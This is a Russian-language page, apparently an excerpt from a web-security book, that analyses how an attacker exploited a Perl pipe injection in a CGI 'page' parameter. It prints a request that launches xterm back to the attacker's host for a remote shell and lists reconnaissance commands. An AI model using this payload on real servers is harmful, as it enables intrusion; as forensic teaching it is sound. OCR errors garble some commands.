SEOSERVISE - Защита сайтов от хакеров.

 
   
 

Главная


 


Взломщик не пытается открыть произвольный файл, а использует в запросе сим­ вол конвейера (|) и конкретную последовательность команд. Тогда вместо открытия реального файла интерпретатор Perl создает дескриптор файла и связывает его с дан­ ными, сгенерированными с помощью команд, указанных в параметре запроса. Пер­ вый из двух последних запросов взломщика имеет следующий вид: Взломщик воспользовался сразу тремя командами Unix : Обратите внимание на использование конвейера в качестве значения параметра раде=. Команды отделяются друг от друга шсстнадцатсричным символом ОА перевода строки. На рис. 5 показано содержимое окна броузера на компьютере взломщика. На экране отображается список файлов корневого каталога сервера, полученный с помощью команды U -1а /, эффективный пользовательский идентификатор процес­са, запустившего сценарий index . cgi , полученный с использованием команды id , и путь к программе xterm , предоставленный командой which xterm . Теперь взломщик может запускать любые команды на Web -сервере с правами учетной записи nobody . Когда ему надоело выполнять одиночные команды, он решил воспользоваться программой xterm для получения интерактивного доступа к оболочке Web -сервера. Последний запрос, обработанный Web -сервером, был связан с попыткой установки с помощью утилиты xterm обратного соединения с компьютером взломщик. Для этого использовался следующий запрос: http : // www . acme - art , coa / index . cgi ? page = | xterm +- dieplay +10.0.1.21:0.0+1261 Команда, указанная в адресе URL , преобразуется к виду xterm - display 10.0.1. 21:0.0 &. В результате ее выполнения создается терминальное окно xterm , которое отображается на экране взломщика по адресу 10.0.1.21:0.0 (рис. 6). Теперь взломщик имеет полный интерактивный доступ к системе компании Acme Art , Inc . Далее не будет рассматриваться системный журнал, однако то, что необходи­мо, мы изучили. Несмотря на аудит безопасности, брандмауэры, жесткую политику управления паролями и т.д., взломщик получил доступ к Web -серверу, воспользовав­ шись тривиальными оплошностями разработчиков и уязвимостью конструкций URL к атакам с использованием одного лишь протокола HTTP .

 

 

 

 

 

 
 

1 |2 |3 |4 |5 |6 |7 |8 |9 |10 |11 |12 |13 |14 |15 |16 |17 |18 |19 |20 |21 |22 |23 |24 |25 |26 |27 |28 |29 |30 |31 |32 |33 |34 |35 |36 |37 |38 |39 |40 |41 |42 |43 |44 |45 |46 |47 |48 |49 |50 |51 |52 |53 |54 |55 |56 |57 |58 |59 |60 |61 |62 |63 |64 |65 |66 |67 |68 |69 |70 |71 |72 |73 |74 |75 |76 |77 |78 |79 |80 |81 |82 |83 |84 |85 |86 |87 |88 |89 |90 |91 |92 |93 |94 |95 |96 |97 |98 |99 |100 |